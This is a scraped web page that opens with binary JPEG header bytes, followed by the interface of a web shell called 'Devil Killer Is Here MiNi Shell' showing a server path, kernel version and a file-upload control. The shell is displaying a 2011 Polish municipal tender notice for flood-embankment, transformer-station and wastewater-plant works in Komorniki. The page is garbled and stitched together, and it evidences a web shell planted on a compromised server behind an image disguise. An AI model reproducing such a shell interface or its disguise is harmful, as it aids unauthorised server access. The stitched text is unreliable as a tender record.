JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111021/345538-N-2011.html

<p class="kh_header"><b>Komorniki: Rozbudowa wałów przeciwpowodziowych, modernizacja stacji transformatorowej  i zwiększenie przepustowości  oczyszczalni ścieków  w Łęczycy w Gminie Komorniki</b><br>
<b>Numer ogłoszenia: 345538 - 2011; data zamieszczenia: 21.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Komorniki , ul. Stawna 1, 62-052 Komorniki, woj. wielkopolskie, tel. 061 8107751, faks 061 8107985.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.komorniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa wałów przeciwpowodziowych, modernizacja stacji transformatorowej  i zwiększenie przepustowości  oczyszczalni ścieków  w Łęczycy w Gminie Komorniki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza możliwości składania ofert częściowych:

CZĘŚĆ I -        Podwyższenie wałów przeciwpowodziowych na terenie oczyszczalni ścieków w Łęczycy.
CZĘŚĆ II -       Zwiększenie przepustowości oczyszczalni ścieków w Łęczycy.
CZĘŚĆ III -  Modernizacja stacji transformatorowej na terenie oczyszczalni ścieków w            Łęczycy.

Opis przedmiotu zamówienia: 

Przedmiotem zamówienia jest rozbudowa wałów przeciwpowodziowych, modernizacja stacji transformatorowej  i zwiększenie przepustowości  oczyszczalni ścieków  w Łęczycy w Gminie Komorniki w następującym zakresie:

1. CZĘŚĆ I
Podwyższenie studni drenażu okrężnego i studzienek drenarskich. Prace na wale: roboty ziemne do rz.60,00m npm, wbicie ścianek  z wyprasek stalowych  na odcinkach wjazdu na wał i wzdłuż drogi  dojazdowej do oczyszczalni, układanie folii, nachylenie skarpy odwodnej 1:2,50; w górnej warstwie  na koronie wału geokrata wypełniona piaskiem na rz.60,50m npm; łączna długość wału 704m w tym 168m ścianki z wyprasek,  wykonanie tzw. ławki o dł. 250m wzdłuż linii PKP bez nawierzchni z geokraty; wykonanie i montaż znaków wodnych i urządzeń pomiarowych ( 2 kpl).

Nie należy wyceniać z Przedmiaru robót:
 - działu 1 - Wycinka i karczowanie drzew i krzewów 
 - działu 2 - podwyższanie terenu.

2. CZĘŚĆ II

Zwiększenie przepustowości  oczyszczania ścieków do 3.827m3 na dobę osiągnięte będzie poprzez modernizację poszczególnych obiektów oczyszczalni ścieków w Łęczycy w zakresie konstrukcji, technologii  i automatyki. Zakres prac obejmuje:
- pompownia główna-wzmocnienie istniejącej ściany poprzez wykonanie ściany wewnętrznej w postaci walca o grubości 0,3 m do poziomu pomostu roboczego, wymiana konstrukcji pomostu roboczego stalowego na ze stali nierdzewnej; demontaż istniejących urządzeń  i armatury- pomp, mieszadła, przepływomierza oraz rurociągów i montaż nowych; montaż przepływomierza ścieków oczyszczonych w komorze za osadnikiem wtórnym, montaż urządzenia wyciągowego na zewnątrz pompowni w wersji ko; w zakresie AKPiA -wykonanie nowej szafy sterowniczej, z której zasilane będą wszystkie urządzenia pompowni. Doprowadzenie nowego kabla zasilającego do każdego z napędów sterowanych z rozdzielni R1. 

-  budynek mechanicznej oczyszczalni ścieków- prace związane z konserwacją i podniesieniem o 0,5m sitopiaskownika ROTAMAT typ Ro5 produkcji HUBER Technology; konstrukcja wykonana będzie ze stali nierdzewnej oraz usunięcie kolizji z belką serwisową - przesunięcie o 50 cm; dostosowanie istniejących rurociągów doprowadzających oraz oprowadzających ścieki do podniesionego urządzenia; modernizacja przewiduje wymianę kompresora o mocy 1,5kW oraz wymianę zestawu hydroforowego doprowadzającego  wodę technologiczną do sito-  piaskownika

- reaktor biologiczny- wymiana mieszadeł zanurzalnych i pompujących z niezbędnym układem urządzeń wyciągowych; wymiana instalacji napowietrzania z zastosowaniem układu z płyt napowietrzający typu HAFI oraz rurociągów doprowadzających powietrze na odcinku rurociąg zbiorczy - płyta napowietrzająca; wymiana układu sond pomiarowych wskazujących wymagane parametry dla prawidłowej pracy urządzenia;

-osadnik wtórny- przegląd i konserwacja  następujących elementów urządzeń: wózek jezdny, układ zgrzebeł dennych, układ zgarniania i części pływających, łożysko centralne, zespół szczotki, układ elektryczny;

-wymiana dmuchaw z modernizacją układu napowietrzania-  zakup i montaż nowej dmuchawy typu GM 35S firmy Aerzen ( dmuchawa podstawowa), demontaż jednej dmuchawy typu GM 15L firmy Aerzen (dmuchawa awaryjna, rezerwowa), modernizacja układu napowietrzania umożliwiająca zasilanie instalacji napowietrzania każdego ciągu technologicznego reaktora niezależnie od siebie;

- obejście rurociągu tłocznego ścieków surowych- na odcinku pomiędzy komorą wylotową (włączenie przed komorą) a pompownią główną ( włączenie za pompownią), odcinek sieci kanalizacyjnej o długości 69,5 m  DN300 z rur PE100 PN10 zgrzewanych doczołowo, montaż zasuw nożowych w  betonowych  studniach kanalizacyjnych O 1000 mm  (1 szt.)  i  O 1200 mm 
(1 szt.) oraz w miejscach włączenia do istniejącego układu, powykonawcza inwentaryzacja geodezyjna, odtworzenie nawierzchni;

-wymiana stanowiska wizualizacji- zakup stanowiska komputerowego o minimalnej konfiguracji: procesor klasy Intel Core 2 Duo, pamięć RAM 2GB, twardy dysk 2x500GB -RAID, karta graficzna o rozdzielczości Full HD; system operacyjny Windows XP Professional; monitor LCD 22 ; klawiatura; mysz; głośniki; zasilacz UPS umożliwiający pracę zestawu przy zaniku zasilania przez min. 5 min.; aktualizacja oprogramowania i wizualizacji pracy oczyszczalni. 

3. CZĘŚĆ III
Przebudowie podlega przystosowanie dwóch rozdzielnic SN 15KV w stacji transformatorowej  K-546 do zabudowy pośrednich układów pomiarowych w związku ze wzrostem mocy na zasilaniu podstawowym i rezerwowym z 100kW na 220KW;   wykonanie konstrukcji wsporczej pod  zabudowanie na zewnątrz stacji agregatu prądotwórczego; konieczność wymiany istniejącego dwupolowego układu SZR (samoczynne załączanie rezerwy) na układ trzypolowy w układzie  transformator I,  transformator II i agregat prądotwórczy 400kVA 0,4 kV..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.24.62.00-5, 45.23.13.00-8, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda wniesienia wadium na warunkach określonych w art. 45 i 46  PZP.  
1.1. Zamawiający żąda od wykonawców wniesienia wadium  w wysokości:
- Część I 	20.000,00 PLN
- Część II	35.000,00 PLN
- Część III 	10.000,00 PLN
1.2. Wadium wnosi się przed upływem terminu składania ofert.
1.3. Wadium według wyboru Wykonawcy może być wniesione w jednej z form określonych w art. 45 ust 6 ustawy - Prawo zamówień publicznych:
-	W pieniądzu: przelew na konto nr 56 1240 1747 1111 0000 1848 9057 w Banku Pekao S.A.
-	W poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
-	W gwarancjach bankowych
-	W gwarancjach ubezpieczeniowych
-	W poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 2007 Nr 42, poz. 275 ze zm.)
1.4. Termin przekazania wadium: przed upływem terminu składania ofert.
 1.5. Za termin wniesienia wadium w formie przelewu pieniężnego uważa się termin uznania środków na wskazanym rachunku bankowym zamawiającego tj. do godziny 10:00 w dniu składania ofert.
1.6. Wadium wniesione w innej formie niż pieniężna musi obejmować odpowiedzialność za wszystkie przypadki powodujące zatrzymanie przez Zamawiającego wadium  określone w art. 46 ust. 4a i ust. 5 ustawy Prawo Zamówień Publicznych.
UWAGA:
Zgodnie z zapisami w ustawie PZP w świetle art. 46 ust. 4a  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 PZP, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

Gwarant, udzielający wykonawcy gwarancji jest zobowiązany niezależnie od zapisów art. 46 ust. 5 PZP taką okoliczność w wystawionym przez siebie dokumencie przewidzieć.
Wadium wniesione w innej formie niż pieniądz należy w oryginale złożyć w Wydziale Inwestycji i Remontów Urzędu Gminy Komorniki pokój nr 18 przed upływem terminu składania ofert.
W przypadku złożenia oferty przez konsorcjum, wadium wniesione w innej formie niż pieniądz, winno być wniesione w imieniu konsorcjum. 

1.7. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 8) poniżej.
1.8. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy PZP, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
1.9. Zamawiający zatrzyma wadium wraz z odsetkami Wykonawcy, którego oferta zostanie wybrana w przypadkach określonych w art. 46 ust. 5 ustawy PZP.
1.10. Zamawiający żądać będzie ponownego wniesienia wadium w przypadkach i na zasadach określonych w art. 46 ust. 3 i 184 ustawy PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku Wykonawca winien załączyć oświadczenie, iż spełnia warunki udziału w postępowaniu z art. 22 ust.1Prawa Zamówień Publicznych. 

Ocena spełniania warunków udziału w postępowaniu przez wykonawców dokonana zostanie metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku Wykonawca winien wykazać realizację robót budowlanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającym robotom budowlanym stanowiącym przedmiot zamówienia, o wartości każdej z robót odpowiadającej wartości złożonej oferty wraz z załączeniem dokumentu potwierdzającego, że roboty budowlane zostały wykonane należycie; Wykonawca wykaże roboty budowlane w zakresie opisanym poniżej wraz z referencjami - zgodnie z Załącznikiem nr 4 do SIWZ;

Dla cz.I. wykonawca, który wykaże się realizacją w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. 2 robót ziemnych, makroniwelacji o wartości  min. 70% wartości składanej oferty, uznany zostanie za spełniającego warunek posiadania wiedzy i doświadczenia.
Dla cz.II wykonawca, który wykaże się realizacją w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. jednej oczyszczalni ścieków o wartości zrealizowanych robót nie mniejszej niż 2.000.000zł obejmującą swym zakresem modernizację lub budowę m.in.: pompowni głównej, reaktora biologicznego, osadnika wtórnego, wymianę dmuchaw i wymianę układu napowietrzania wraz z wykonaniem oprogramowania i wizualizacji pracy oczyszczalni, uznany zostanie za spełniającego warunek posiadania wiedzy i doświadczenia.

Dla cz. III wykonawca, który wykaże się realizacją w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, min. 2 robót budowlanych w zakresie instalacji energetycznej, uznany zostanie za spełniającego warunek posiadania wiedzy i doświadczenia.

Ocena spełniania warunków udziału w postępowaniu przez wykonawców dokonana zostanie metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia warunku Wykonawca winien wykazać, że osoby,  które będą uczestniczyć w wykonywaniu zamówienia posiadają uprawnienia do wykonywania samodzielnych funkcji technicznych w zakresie:

Część I  kierowania robotami branży konstrukcyjno-budowlanej i instalacyjnej, 

Część II kierowania robotami branży konstrukcyjno-budowlanej, instalacyjnej 
             i elektrycznej.
 
Część III kierowania robotami branży konstrukcyjno-budowlanej i elektrycznej.

wraz z wypełnieniem Załącznika nr 6 i 7 do SIWZ.

Wykonawca, który wykaże osoby posiadające uprawnienia do kierowania robotami dla poszczególnych części wg wskazanych  branż  uznany zostanie  za spełniającego warunek dysponowania osobami zdolnymi do wykonania zamówienia.

Ocena spełniania warunków udziału w postępowaniu przez wykonawców dokonana zostanie metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia Warunku Wykonawca przedstawi opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.

Wykonawca, który załączy do swojej oferty ważną polisę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności, zostanie uznany za spełniającego warunek posiadania sytuacji ekonomicznej i finansowej do wykonania zamówienia.

Ocena spełniania warunków udziału w postępowaniu przez wykonawców dokonana zostanie metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy w stosunku do treści ofert na podstawie, której dokonano wyboru wykonawcy w zakresie teminu w  przypadku:
- wystąpienia robót dodatkowych
- niekorzystnych warunków atmosferycznych
- konieczności przebudowy urządzeń 
  podziemnych niezinwentaryzowanych albo  
  źle zinwentaryzowanych na mapach 
- innych zdarzeń zewnętrznych obiektywnie 
  niemożliwych do przewidzenia i niemożliwych do 
  zapobieżenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.komorniki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Komorniki
ul. Stawna 1
62 - 052 Komorniki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2011 godzina 10:00, miejsce: Urząd Gminy Komorniki
ul. Stawna 1
62 - 052 Komorniki 
Pokój nr 1 - Biuro Podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
